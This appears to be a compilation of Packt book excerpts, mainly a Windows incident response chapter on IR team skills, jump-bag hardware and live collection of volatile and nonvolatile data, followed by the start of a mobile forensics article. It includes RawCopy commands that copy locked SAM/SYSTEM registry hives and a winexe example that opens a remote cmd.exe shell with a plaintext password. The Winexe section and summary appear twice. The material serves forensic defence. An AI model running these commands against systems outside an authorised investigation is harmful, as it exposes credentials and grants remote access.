In this process, the server or host on the network responds to the ping request, and such a response is called an echo. A ping of death refers to sending malformed or oversized ICMP packets to a server in order to crash the system.

Other protocols in the transport layer

- Stream Control Transmission Protocol (SCTP): This is a connection-oriented protocol similar to TCP, but it provides facilities such as multi-streaming and multi-homing for better performance and redundancy. It is used in UNIX-like operating systems.
- Datagram Congestion Control Protocol (DCCP): As the name implies, this is a transport layer protocol used for congestion control. Applications here include Internet telephony and video/audio streaming over the network.
- Fiber Channel Protocol (FCP): This protocol is used in high-speed networking. One of its prominent applications is the Storage Area Network (SAN).

A Storage Area Network (SAN) is a network architecture used to attach remote storage devices, such as tape drives and disk arrays, to the local server. This facilitates using storage devices as if they were local devices.

Summary

This article covered protocols and security in the transport layer, which is the fourth layer of the OSI model.

Resources for Article:

Further resources on this subject:
- The GNS3 orchestra [article]
- CISSP: Vulnerability and Penetration Testing for Access Control [article]
- CISSP: Security Measures for Access Control [article]
Incident Response and Live Analysis

Packt
10 Jun 2016
30 min read
In this article by Ayman Shaaban and Konstantin Sapronov, the authors of the book Practical Windows Forensics, we describe the stages of preparation for responding to an incident, a matter that deserves close attention. In some cases, the lack of the necessary tools during an incident leads to the inability to perform the necessary actions at the right time. Taking into account that the reaction time to an incident depends on the efficiency of the incident handling process, it becomes clear that the technical preparation of the IR team must be done very carefully. The whole set of requirements for the IR team can be divided into several categories:

- Skills
- Hardware
- Software

(For more resources related to this topic, see here.)

Let's consider the main issues that may arise during the preparation of the incident response team in more detail. If we want to build a computer security incident response team, we need people with a certain set of skills and technical expertise to perform technical tasks and effectively communicate with external contacts. The skills that members of the team need to have can be divided into two groups:

- Personal skills
- Technical skills

Personal skills

Personal skills are very important for a successful response team. This is because interaction with team members who are technical experts but have poor social skills can lead to misunderstanding and misinterpretation of results, the consequences of which may affect the team's reputation. A list of key personal skills is discussed in the following sections.

Written communication

For many IR teams, a large part of their communication occurs through written documents. These communications can take many forms, including e-mails concerning incidents, documentation of event or incident reports, vulnerabilities, and other technical information notifications. Incident response team members must be able to write clearly and concisely, describe activities accurately, and provide information that is easy for their readers to understand.

Oral communication

The ability to communicate effectively through spoken communication is also an important skill, ensuring that incident response team members say the right words to the right people.

Presentation skills

Not all technical experts have good presentation skills. They may not be comfortable in front of a large audience. Gaining confidence in presentation skills will take time and effort for the team's members to become more experienced and comfortable in such situations.

Diplomacy

The members of the incident response team interact with people who may have a variety of goals and needs. Skilled incident response team members will be able to anticipate potential points of contention, respond appropriately, maintain good relationships, and avoid offending others. They will also understand that they are representing the IR team and their organization. Diplomacy and tact are very important.

The ability to follow policies and procedures

Another important skill that members of the team need is the ability to follow and support the established policies and procedures of the organization or team.

Team skills

IR staff must be able to work in a team environment as productive and cordial team players. They need to be aware of their responsibilities, contribute to the goals of the team, and work together to share information, workload, and experiences.
They must be flexible and willing to adapt to change. They also need skills for interacting with other parties.

Integrity

The nature of IR work means that team members often deal with information that is sensitive and, occasionally, they might have access to information that is newsworthy. The team's members must be trustworthy, discreet, and able to handle information in confidence according to the guidelines, any constituency agreements or regulations, and/or any organizational policies and procedures. In their efforts to provide technical explanations or responses, the IR staff must be careful to provide appropriate and accurate information while avoiding the dissemination of any confidential information that could detrimentally affect another organization's reputation, result in the loss of the IR team's integrity, or affect other activities that involve other parties.

Knowing one's limits

Another important ability for the IR team's members is being able to readily admit when they have reached the limit of their own knowledge or expertise in a given area. However difficult it is to admit a limitation, individuals must recognize their limitations and actively seek support from their team members, other experts, or their management.

Coping with stress

The IR team's members will often find themselves in stressful situations. They need to be able to recognize when they are becoming stressed, be willing to make their fellow team members aware of the situation, and take (or seek help with) the necessary steps to control themselves and maintain their composure. In particular, they need the ability to remain calm in tense situations, ranging from an excessive workload to an aggressive caller to an incident where human life or a critical infrastructure may be at risk. The team's reputation, and each individual's personal reputation, will be enhanced or will suffer depending on how such situations are handled.

Problem solving

IR team members are confronted with data every day, and sometimes the volume of information is large. Without good problem-solving skills, staff members could become overwhelmed with the volumes of data related to incidents and other tasks that need to be handled. Problem-solving skills also include the ability of the IR team's members to "think outside the box" or look at issues from multiple perspectives to identify relevant information or data.

Time management

Along with problem-solving skills, it is also important for the IR team's members to be able to manage their time effectively. They will be confronted with a multitude of tasks, ranging from analyzing, coordinating, and responding to incidents, to performing duties such as prioritizing their workload, attending and/or preparing for meetings, completing time sheets, collecting statistics, conducting research, giving briefings and presentations, traveling to conferences, and possibly providing on-site technical support.

Technical skills

Another important component of the skills needed for an IR team to be effective is the technical skills of its staff. These skills, which define the depth and breadth of understanding of the technologies used by the team and the constituency it serves, are outlined in the following sections. The technical skills that the IR team members should have can be divided into two groups: security fundamentals and incident handling skills.

Security fundamentals

Let's look at some of the security fundamentals in the following subsections.
Security principles

The IR team's members need to have a general understanding of the basic security principles, such as the following:

- Confidentiality
- Availability
- Authentication
- Integrity
- Access control
- Privacy
- Nonrepudiation

Security vulnerabilities and weaknesses

To understand how any specific attack manifests in a given software or hardware technology, the IR team's members need to be able to first understand the fundamental causes of the vulnerabilities through which most attacks are exploited. They need to be able to recognize and categorize the most common types of vulnerabilities and associated attacks, such as those that might involve the following:

- Physical security issues
- Protocol design flaws (for example, man-in-the-middle attacks or spoofing)
- Malicious code (for example, viruses, worms, or Trojan horses)
- Implementation flaws (for example, buffer overflows or timing windows/race conditions)
- Configuration weaknesses
- User errors or indifference

The Internet

It is important that the IR team's members also understand the Internet. Without this fundamental background information, they will struggle or fail to understand other technical issues, such as the lack of security in the underlying protocols and services that are used on the Internet, or to anticipate the threats that might occur in the future.

Risks

The IR team's members need to have a basic understanding of computer security risk analysis. They should understand the effects on their constituency of various types of risks, such as potentially widespread Internet attacks, national security issues as they relate to their team and constituency, physical threats, financial threats, loss of business, reputation, or customer confidence, and damage or loss of data.

Network protocols

Members of the IR team need to have a basic understanding of the common (or core) network protocols that are used by the team and the constituency they serve. For each protocol, they should have a basic understanding of the protocol itself, its specification, and how it is used. In addition to this, they should understand the common types of threats or attacks against the protocol, as well as strategies to mitigate or eliminate such attacks. For example, at a minimum, the staff should be familiar with protocols such as IP, TCP, UDP, ICMP, ARP, and RARP. They should understand how these protocols work, what they are used for, the differences between them, some of their common weaknesses, and so on. In addition to this, the staff should have a similar understanding of protocols such as TFTP, FTP, HTTP, HTTPS, SNMP, SMTP, and any other relevant protocols.

Specialist skills include a more in-depth understanding of security concepts and principles in all the preceding areas, in addition to expert knowledge of the mechanisms and technologies that lead to flaws in these protocols, the weaknesses that can be exploited (and why), the types of exploitation methods that would likely be used, and the strategies to mitigate or eliminate these potential problems. They should have an expert understanding of additional protocols or Internet technologies (DNSSEC, IPv6, IPSEC, and other telecommunication standards that might be implemented in or interface with their constituents' networks, such as ATM, BGP, broadband, voice over IP, wireless technology, other routing protocols, or new emerging technologies, and so on). They can then provide expert technical guidance to other members of the team or constituency.
Network applications and services

The IR team's staff need a basic understanding of the common network applications and services that the team and the constituency use (DNS, NFS, SSH, and so on). For each application or service, they should understand its purpose, how it works, its common usages, secure configurations, and the common types of threats or attacks against the application or service, as well as mitigation strategies.

Network security issues

The members of the IR team should have a basic understanding of the concepts of network security and be able to recognize vulnerable points in network configurations. They should understand the concepts and basics of perimeter security, such as network firewalls (design, packet filtering, proxy systems, DMZ, bastion hosts, and so on) and router security; the potential for disclosure of data traveling across the network (for example, through packet monitoring or "sniffers"); and the threats related to accepting untrustworthy information.

Host or system security issues

In addition to understanding security issues at the network level, the IR team's members need to understand security issues at the host level for the various types of operating systems (UNIX, Windows, or any other operating systems used by the team or constituency). Before understanding the security aspects, an IR team member must first have the following:

- Experience using the operating system (user security issues)
- Some familiarity with managing and maintaining the operating system (as an administrator)

Then, for each operating system, the IR team member needs to know how to perform the following:

- Configure (harden) the system securely
- Review configuration files for security weaknesses
- Identify common attack methods
- Determine whether a compromise attempt occurred
- Determine whether an attempted system compromise was successful
- Review log files for anomalies
- Analyze the results of attacks
- Manage system privileges
- Secure network daemons
- Recover from a compromise

Malicious code

The IR team's members must understand the different types of malicious code attacks that occur and how these can affect their constituency (system compromises, denial of service, loss of data integrity, and so on). Malicious code can have different types of payloads that can cause a denial of service attack or web defacement, or the code can contain more "dynamic" payloads that can be configured to result in multifaceted attack vectors. The staff should understand not only how malicious code is propagated through some of the obvious methods (disks, e-mail, programs, and so on), but also how it can propagate through other means, such as PostScript, Word macros, MIME, peer-to-peer file sharing, or boot-sector viruses affecting operating systems running on PC and Macintosh platforms. The IR team's staff must be aware of how such attacks occur and propagate, the risks and damage associated with them, prevention and mitigation strategies, detection and removal processes, and recovery techniques. Specialist skills include expertise in performing analysis, black box testing, and reverse engineering of the malicious code associated with such attacks, and in providing advice to the team on the best approaches for an effective response.

Programming skills

Some team members need to have system and network programming experience.
The team should ensure that a range of programming languages is covered for the operating systems that the team and the constituency use. For example, the team should have experience in the following:

- C
- Python
- Awk
- Java
- Shell (all variations)
- Other scripting tools

These scripts or programming tools can be used to assist in the analysis and handling of incident information (for example, writing scripts to count and sort through various logs, search databases, look up information, extract information from logs or files, and collect and merge data).

Incident handling skills

- Local team policies and protocols
- Understanding and identifying intruder techniques
- Communication with sites
- Incident analysis
- Maintenance of incident records

The hardware for IR and the Jump Bag

Much attention should be paid to preparing, in advance, the set of equipment that may be required while handling an incident. In some cases, the lack of a necessary tool at the right moment prevents the necessary actions from being taken. This set of equipment is called the Jump Bag. What goes into such a kit is largely determined by the budget the organization can afford; nevertheless, there is a certain necessary minimum that will allow the team to handle incidents in small quantities. If the budget allows it, it is possible to buy a turnkey solution that includes all the necessary equipment and a case for its transportation. As an instance of such a solution, FREDL + Ultra Kit could be recommended. FREDL is short for Forensic Recovery of Evidence Device Laptop. With Ultra Kit, this solution will cost about 5,000 USD. Ultra Kit contains a set of write-blockers and a set of adapters and connectors to obtain images of hard drives with different interfaces.

More details can be found on the manufacturer's website at https://www.digitalintelligence.com/products/ultrakit/.

Its price aside, this solution has a lot of advantages relative to its cost: you get a complete starter kit for handling incidents, and Ultra Kit allows you to safely transport the equipment without fear of damage. The FRED-L laptop is based on modern hardware, and the specifications are constantly updated to meet current requirements. The current specifications can be found on the manufacturer's website at http://www.digitalintelligence.com/products/fredl/.

However, if you want to replace the expensive turnkey solution, you can build a cheaper alternative that will save 20-30% of the budget by buying the components separately. As a workstation, you can choose a laptop with the following specifications:

- Intel Core i7-6700K Skylake quad-core processor, 4.0 GHz, 8 MB Intel Smart Cache
- 16 GB PC4-17000 DDR4 2133 memory
- 256 GB solid state internal SATA drive
- Intel Z170 Express chipset
- NVIDIA GeForce GTX 970M with 6 GB GDDR5 VRAM

This specification will provide a comfortable workstation for work on the road. For transporting the equipment, we recommend paying attention to Pelican (http://www.pelican.com) cases; the manufacturer can equip a case to meet your needs.

One of the typical tasks in incident handling is obtaining images of hard drives. For this task, you can use either a duplicator or a write-blocker paired with a computer. Duplicators are certainly the more convenient solution; they allow you to quickly get a disk image without using additional software. Their main drawback is the price.
However, if you often have to image hard drives and you have a few thousand dollars, the purchase of a duplicator is a good investment. If imaging hard drives is a relatively rare task and you have a limited budget, you can purchase a write-blocker, which will cost 300-500 USD; however, you will then also need a computer and software. To pick out the necessary equipment, you can visit http://www.insectraforensics.com, where you can find equipment from different manufacturers. Also, do not forget about the hard drives themselves: it is worth buying a few large-capacity drives so that you always have enough storage on hand.

To summarize, responders need to include the following items in a basic set:

- Several network cables (straight-through or loopback)
- A serial cable with a serial USB adapter
- Network serial adapters
- Hard drives (various sizes)
- Flash drives
- A Linux Live DVD
- A portable drive duplicator with a write-blocker
- Various drive interface adapters
- A four-port hub
- A digital camera
- Cable ties
- Cable snips
- Assorted screws and hex drivers
- Notebooks and pens
- Chain of Custody forms
- Incident handling procedures

Software

As for the software that you should always have on hand: the variety of software that can be used while processing an incident allows you to select programs based on preferences, skills, and budget. Some prefer command-line utilities, while others find a GUI more convenient. Sometimes the use of certain tools is dictated by the circumstances under which the team has to work. We strongly recommend that you prepare the required software in advance and thoroughly test the entire set.

Live versus mortem

The initial reaction to an incident is a very important step in the process of computer incident management; the success of the investigation depends on carrying out this step correctly. Moreover, a correct and timely response is needed to reduce the damage caused by the incident. The traditional approach of analyzing disks is not always practical, and in some cases it is simply not possible. In today's world, the development of computer technology has led to many companies having distributed networks spanning many cities, countries, and continents. With physically disconnecting each computer from the network out of the question, the traditional investigation of each computer is not possible. In such cases, the incident responder should be able to carry out a preliminary assessment remotely, and as soon as possible: view the list of running processes, open network connections, open files, and the list of logged-in users on the system. Then, if necessary, a full investigation can be carried out.

In this article, we will look at some approaches that the responder may apply in a given situation. In some cases, even when we have physical access to the machine, live response is the only viable form of incident response. Consider, for example, cases where we are dealing with large disk arrays. Here, there are several problems at once. The first problem is that finding the space to store images of so much data is difficult. In addition, the time required to analyze such large amounts of data is unreasonably high. Typically, such large volumes of data belong to heavily loaded servers serving hundreds of thousands of users, so taking them down, or even a reboot, is not acceptable for the business.
Another scenario that requires the live forensics approach is when an encrypted filesystem is used. In cases where the analyst doesn't have the key to decrypt the disk, live forensics is a good alternative for obtaining data from a system whose filesystem is encrypted. This is not an exhaustive list of cases where live analysis is applicable.

It is worth noting one very important point: during live analysis, it is not possible to avoid making changes to the system. Connecting external USB devices, network connectivity, user logons, or launching an executable file will modify the system in a variety of log files, registry keys, and so on. Therefore, you need to understand which changes were caused by the actions of the responders, and document them.

Volatile data

Under the principle of "order of volatility", you must first collect the information that is classified as volatile data (the list of network connections, the list of running processes, logon sessions, and so on), which will be irretrievably lost if the computer is powered off. Then, you can start to collect nonvolatile data, which can also be obtained with the traditional approach of analyzing a disk image. The main difference is that a live forensics set of data is easier to obtain from a working machine. This article will focus on the collection of volatile data. Typically, this category includes the following data:

- System uptime and the current time
- Network parameters (the NetBIOS name cache, active connections, the routing table, and so on)
- NIC configuration settings
- Logged-on users and active sessions
- Loaded drivers
- Running services
- Running processes and their related parameters (loaded DLLs, open handles, and ownership)
- Autostart modules
- Shared drives and files opened remotely

Recording the time and date of the data collection allows you to define the time interval in which the investigator will perform the analysis of the system:

(date /t) & (time /t) > %COMPUTERNAME%\systime.txt
systeminfo | find "Boot Time" >> %COMPUTERNAME%\systime.txt

The second command shows how long the machine has been running since the last reboot. Using the %COMPUTERNAME% environment variable, we can set up separate directories for each machine in case we need to repeat the process of collecting information on different computers in a network.

In some cases, signs of compromise are clearly visible in the analysis of network activity. The next set of commands allows you to get this information:

nbtstat -c > %COMPUTERNAME%\NetNameCache.txt
netstat -a -n -o > %COMPUTERNAME%\NetStat.txt
netstat -rn > %COMPUTERNAME%\NetRoute.txt
ipconfig /all > %COMPUTERNAME%\NIC.txt
promqry > %COMPUTERNAME%\NSniff.txt

The first command uses nbtstat.exe to obtain information from the NetBIOS name cache; it displays the NetBIOS names and their corresponding IP addresses. The second and third commands use netstat.exe to record all of the active connections, listening ports, and the routing table. For information about the network settings of the network interfaces, the ipconfig.exe command is used. The last command starts the Microsoft promqry utility, which identifies network interfaces on the local machine that operate in promiscuous mode. This mode is required by network sniffers, so its detection indicates that the computer may be running software that listens to network traffic.
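Outputs like these can then be screened with short scripts, in line with the scripting skills discussed earlier. As a sketch, the following Python snippet parses the saved netstat output and prints connections whose remote port is outside a hypothetical allow-list (adjust the list and the path to your environment):

import os

ALLOWED_PORTS = {'80', '443', '53'}  # illustrative allow-list

path = os.path.join(os.environ.get('COMPUTERNAME', 'host'), 'NetStat.txt')
with open(path) as report:
    for line in report:
        parts = line.split()
        # Expected "netstat -a -n -o" row: proto, local address, remote address, state, PID
        if len(parts) >= 3 and parts[0] in ('TCP', 'UDP'):
            port = parts[2].rsplit(':', 1)[-1]
            if port.isdigit() and port not in ALLOWED_PORTS:
                print(line.rstrip())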
To enumerate all the logged-on users on the computer, you can use the Sysinternals tools:

psloggedon -x > %COMPUTERNAME%\LoggedUsers.txt
logonsessions -p >> %COMPUTERNAME%\LoggedOnUsers.txt

The PsLoggedOn.exe command lists both types of users: those who are logged on to the computer locally, and those who logged on remotely over the network. Using the -x switch, you can get the time at which each user logged on. With the -p key, logonsessions will display all of the processes started by each user during their session. It should be noted that logonsessions must be run with administrator privileges.

To get a list of all drivers that are loaded into the system, you can use the WDK drivers.exe utility:

drivers.exe > %COMPUTERNAME%\drivers.txt

The next set of commands obtains the list of running processes and related information:

tasklist /svc > %COMPUTERNAME%\taskdserv.txt
psservice > %COMPUTERNAME%\trasklst.txt
tasklist /v > %COMPUTERNAME%\taskuserinfo.txt
pslist /t > %COMPUTERNAME%\tasktree.txt
listdlls > %COMPUTERNAME%\lstdlls.txt
handle -a > %COMPUTERNAME%\lsthandles.txt

The tasklist.exe utility, run with the /svc switch, enumerates the list of running processes with the services in their context. While that command displays the list of running services, PsService retrieves information about services using the registry and the SCM database. Services are a traditional way for attackers to access a previously compromised system. Services can be configured to run automatically without user intervention, and they can be launched as part of another process, such as svchost.exe. In addition to this, remote access can be provided through completely legitimate services, such as telnet or FTP.

To associate users with their running processes, use the tasklist /v command. To enumerate the DLLs loaded in each process, with the full path to each DLL, you can use listdlls.exe from Sysinternals. Another utility, handle.exe, can be used to list all the handles that processes have open: registry keys, files, ports, mutexes, and so on. Both utilities require administrator privileges to run. These tools can help identify malicious DLLs that were injected into processes, as well as the files those processes are accessing.

The next group of commands allows you to get a list of programs that are configured to start automatically:

autorunsc.exe -a > %COMPUTERNAME%\autoruns.txt
at > %COMPUTERNAME%\at.txt
schtasks /query > %COMPUTERNAME%\schtask.txt

The first command starts the Sysinternals utility autoruns and displays a list of executables that run at system startup and when users log on. This utility allows you to detect malware that uses the popular and well-known methods of installing itself persistently into the system. The two other commands (at and schtasks) display the list of commands that run on a schedule; running the at command also requires administrator privileges. Services are often used to install backdoor mechanisms, but services run constantly in the system and can thus be easily detected during live response, so an attacker may instead create a backdoor that runs on a schedule to avoid detection. For example, an attacker could create a task that runs the malware just outside working hours.
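Rather than typing each collector by hand, the volatile-data commands above can be tied together in a small script. This Python sketch covers only a subset of them and assumes the Sysinternals tools are on the PATH:

import os
import subprocess

outdir = os.environ.get('COMPUTERNAME', 'host')
os.makedirs(outdir, exist_ok=True)

# A subset of the volatile-data collectors discussed in this section.
commands = {
    'NetStat.txt':   ['netstat', '-a', '-n', '-o'],
    'NIC.txt':       ['ipconfig', '/all'],
    'taskdserv.txt': ['tasklist', '/svc'],
    'autoruns.txt':  ['autorunsc.exe', '-a'],  # Sysinternals, assumed on PATH
}

for filename, command in commands.items():
    with open(os.path.join(outdir, filename), 'w') as output:
        # Run each collector and persist its output for later analysis.
        subprocess.run(command, stdout=output, stderr=subprocess.DEVNULL)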
To get a list of shared drives and files opened remotely, you can use the following two commands:

psfile > %COMPUTERNAME%\openfileremote.txt
net share > %COMPUTERNAME%\drives.txt

Nonvolatile data

After the volatile data has been collected, you can continue with the nonvolatile data. This data can also be obtained at the disk analysis stage but, as we mentioned earlier, analysis of the disk is not possible in some cases. This data includes the following:

- The list of installed software and updates
- User info
- Metadata about a filesystem's timestamps
- Registry data

However, when obtaining this data from a live, running system, there is a difficulty: many of these files cannot be copied in the usual way, as they are locked by the operating system. To work around this, use a specialized utility. One such utility is RawCopy.exe, authored by Joakim Schicht. This is a console application that copies files off NTFS volumes using low-level disk reading. The application has two mandatory parameters, the target file and the output path:

- param1: This is the full path to the target file to extract; it also supports IndexNumber instead of a file path
- param2: This is a valid path to the output directory

This tool lets you copy files that are usually not accessible because the system has locked them: for instance, registry hives such as SYSTEM and SAM, files inside System Volume Information, or any other file on the volume. The input file may be specified either with the full file path or by its $MFT record number (index number).

Here's an example of copying the SYSTEM hive off a running system:

RawCopy.exe C:\WINDOWS\system32\config\SYSTEM %COMPUTERNAME%\SYSTEM

Here's an example of extracting the $MFT by specifying its index number:

RawCopy.exe C:0 %COMPUTERNAME%\mft

Here's an example of extracting MFT reference number 30224 and all its attributes, including $DATA, and dumping it into C:\tmp:

RawCopy.exe C:30224 C:\tmp -AllAttr

To download RawCopy, go to https://github.com/jschicht/RawCopy.

Knowing what software is installed, and which updates have been applied, helps further the investigation because it shows possible ways the system could have been compromised through a vulnerability in the software. One of the first actions an attacker takes is a scan of the system to detect active services and exploit the vulnerabilities in them; services that were not patched can thus be utilized for remote system penetration. One way to collect the set of installed software and updates is to use the systeminfo utility:

systeminfo > %COMPUTERNAME%\sysinfo.txt

Moreover, skilled attackers can perform the same actions themselves and install the necessary updates in order to hide the traces of their penetration into the system. After identifying vulnerable services and successfully exploiting them, an attacker creates an account in order to subsequently use legal ways to enter the system.
Therefore, the analysis of data about the users of the system can reveal the following traces of compromise:

- The Recent folder contents, including LNK files and jump lists
- LNK files in the Office Recent folder
- The Network Recent folder contents
- The entire Temp folder
- The entire Temporary Internet Files folder
- The PrivacIE folder
- The Cookies folder
- The Java Cache folder contents

Now, let's consider the preceding cases as follows:

Collecting the Recent folder is done as follows:

robocopy.exe %RECENT% %COMPUTERNAME%\Recent /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\Recent\log.txt

Here, %RECENT% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%RECENT% = %systemdrive%\Documents and Settings\%USERNAME%\Recent

For Windows 6.x (Windows Vista and newer), it is:

%RECENT% = %systemdrive%\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent

Collecting the Office Recent folder is done as follows:

robocopy.exe %RECENT_OFFICE% %COMPUTERNAME%\Recent_Office /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\Recent_Office\log.txt

Here, %RECENT_OFFICE% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%RECENT_OFFICE% = %systemdrive%\Documents and Settings\%USERNAME%\Application Data\Microsoft\Office\Recent

For Windows 6.x (Windows Vista and newer), it is:

%RECENT_OFFICE% = %systemdrive%\Users\%USERNAME%\AppData\Roaming\Microsoft\Office\Recent

Collecting the Network Shares Recent folder is done as follows:

robocopy.exe %NetShares% %COMPUTERNAME%\NetShares /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\NetShares\log.txt

Here, %NetShares% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%NetShares% = %systemdrive%\Documents and Settings\%USERNAME%\NetHood

For Windows 6.x (Windows Vista and newer), it is:

%NetShares% = %systemdrive%\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Network Shortcuts

Collecting the Temporary folder is done as follows:

robocopy.exe %TEMP% %COMPUTERNAME%\TEMP /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\TEMP\log.txt

Here, %TEMP% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%TEMP% = %systemdrive%\Documents and Settings\%USERNAME%\Local Settings\Temp

For Windows 6.x (Windows Vista and newer), it is:

%TEMP% = %systemdrive%\Users\%USERNAME%\AppData\Local\Temp

Collecting the Temporary Internet Files folder is done as follows:

robocopy.exe %TEMP_INTERNET_FILES% %COMPUTERNAME%\TEMP_INTERNET_FILES /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\TEMP_INTERNET_FILES\log.txt

Here, %TEMP_INTERNET_FILES% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%TEMP_INTERNET_FILES% = %systemdrive%\Documents and Settings\%USERNAME%\Local Settings\Temporary Internet Files

For Windows 6.x (Windows Vista and newer), it is:

%TEMP_INTERNET_FILES% = %systemdrive%\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files

Collecting the PrivacIE folder is done as follows:

robocopy.exe %PRIVACYIE% %COMPUTERNAME%\PrivacIE /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\PrivacIE\log.txt

Here, %PRIVACYIE% depends on the version of Windows.
For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%PRIVACYIE% = %systemdrive%\Documents and Settings\%USERNAME%\PrivacIE

For Windows 6.x (Windows Vista and newer), it is:

%PRIVACYIE% = %systemdrive%\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PrivacIE

Collecting the Cookies folder is done as follows:

robocopy.exe %COOKIES% %COMPUTERNAME%\Cookies /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\Cookies\log.txt

Here, %COOKIES% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%COOKIES% = %systemdrive%\Documents and Settings\%USERNAME%\Cookies

For Windows 6.x (Windows Vista and newer), it is:

%COOKIES% = %systemdrive%\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Cookies

Collecting the Java Cache folder is done as follows:

robocopy.exe %JAVACACHE% %COMPUTERNAME%\JAVACACHE /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\JAVACACHE\log.txt

Here, %JAVACACHE% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%JAVACACHE% = %systemdrive%\Documents and Settings\%USERNAME%\Application Data\Sun\Java\Deployment\cache

For Windows 6.x (Windows Vista and newer), it is:

%JAVACACHE% = %systemdrive%\Users\%USERNAME%\AppData\LocalLow\Sun\Java\Deployment\cache

Remote live response

However, as mentioned earlier, it is often necessary to collect information remotely. On Windows systems, this is often done using the Sysinternals PsExec utility. PsExec lets you execute commands on remote computers and does not require installation on the target system. PsExec works as follows: the psexec.exe executable carries another executable, PSEXESVC, as an embedded resource. PsExec unpacks this hidden resource to the administrative share Admin$ (C:\Windows) of the remote computer, as Admin$\system32\psexesvc.exe. After copying it, PsExec installs and runs the service using the API functions of the Windows service management. Then, after starting psexesvc, a data connection (for sending input commands and receiving results) is established between psexesvc and psexec. Upon completion of the work, psexec stops the service and removes it from the target computer.

If the remote collection of information has to be performed from a working machine running a UNIX OS, the Winexe utility can be used. Winexe is a GNU/Linux-based application that allows users to execute commands remotely on Windows NT/2000/XP/2003/Vista/7/8 systems. It installs a service on the remote system, executes the command, and uninstalls the service. Winexe allows the execution of most Windows shell commands:

winexe -U [Domain/]User%Password //host command

To launch a Windows shell from inside your Linux system, use the following command:

winexe -U HOME/Administrator%Pass123 //192.168.0.1 "cmd.exe"

Summary

In this article, we discussed what we should have in the Jump Bag to handle a computer incident, and what kind of skills the members of the IR team require. We also took a look at live response, collected volatile and nonvolatile information from a live system, and discussed different tools for collecting this information, as well as when to use a live response approach as an alternative to traditional forensics.
If the remote collection of information is necessary from a working machine running a UNIX OS, the Winexe utility can be used. Winexe is a GNU/Linux-based application that allows users to execute commands remotely on Windows NT/2000/XP/2003/Vista/7/8 systems. It installs a service on the remote system, executes the command, and uninstalls the service. Winexe allows execution of most of the Windows shell commands:

winexe -U [Domain/]User%Password //host command

To launch a Windows shell from inside your Linux system, use the following command:

winexe -U HOME/Administrator%Pass123 //192.168.0.1 "cmd.exe"

Summary

In this article, we discussed what we should have in the Jump Bag to handle a computer incident, and what kind of skills the members of the IR team require. We took a look at live response, collected volatile and nonvolatile information from a live system, discussed different tools to collect this information, and considered when a live response approach should be used as an alternative to traditional forensics.

Resources for Article:

Further resources on this subject:

BackTrack Forensics [article]
Mobile Phone Forensics – A First Step into Android Forensics [article]
Forensics Recovery [article]


Mobile Forensics

Packt
24 May 2016
15 min read
In this article by Soufiane Tahiri, the author of Mastering Mobile Forensics, we will look at the basics of smartphone forensics. Smartphone forensics is a relatively new and quickly emerging field of interest within the digital forensic community and law enforcement, as today's mobile devices are getting smarter, cheaper, and more easily available for common daily use. (For more resources related to this topic, see here.)

To investigate the growing number of digital crimes and complaints, researchers have put in a lot of effort to design the most affordable investigative model; in this article, we will emphasize the importance of paying real attention to the growing market of smartphones and the efforts made in this field from a digital forensic point of view, in order to design the most comprehensive investigation process.

Smartphone forensics models

Given the pace at which mobile technology grows and the variety of complexities produced by today's mobile data, forensic examiners face serious adaptation problems, so developing and adopting standards makes sense. The reliability of evidence depends directly on the investigative processes adopted; skipping a step, deliberately or accidentally, may (and certainly will) lead to incomplete evidence and increase the risk of rejection in a court of law.

Today, there is no standard or unified model adapted to acquiring evidence from smartphones. The dramatic development of smart devices suggests that any forensic examiner will have to apply as many independent models as necessary in order to collect and preserve data. As with any forensic investigation, several approaches and techniques can be used to acquire, examine, and analyze data from a mobile device. This section provides a proposed process that summarizes guidelines from different standards and models (SWGDE Best Practices for Mobile Phone Forensics, NIST Guidelines on Mobile Device Forensics, and Developing Process for Mobile Device Forensics by Det. Cynthia A. Murphy). The following flowchart schematizes the overall process:

Evidence intake: This triggers the examination process. This step should be documented.
Identification: The examiner needs to identify the device's capabilities and specifications, and should document everything that takes place during the identification process.
Preparation: The examiner should prepare the tools and methods to use, and must document them.
Securing and preserving evidence: The examiner should protect the evidence and secure the scene, as well as isolate the device from all networks. The examiner needs to be vigilant when documenting the scene.
Processing: At this stage, the examiner performs the actual (and technical) data acquisition and analysis, and documents the steps, the tools used, and all findings.
Verification and validation: The examiner should be sure of the integrity of the findings, and must validate the acquired data and evidence in this step. This step should be documented as well.
Reporting: The examiner produces a final report documenting the process and findings.
Presentation: This stage is meant to exhibit and present the findings.
Archiving: At the end of the forensic process, the examiner should preserve the data, report, tools, and all findings in common formats for future use.

Low-level techniques

Digital forensic examiners can neither always nor exclusively rely on commercially available tools; handling low-level techniques is a must.
This section also covers techniques for extracting strings from different objects (for example, smartphone images). Any digital examiner should be familiar with concepts and techniques such as the following (a short file-carving sketch follows this list):

File carving: This is defined as the process of extracting a collection of data from a larger data set, applied to a digital investigation case. File carving is the process of extracting data from unallocated filesystem space using the inner structure of file types rather than the filesystem structure, meaning that the extraction process is principally based on file type headers and trailers.

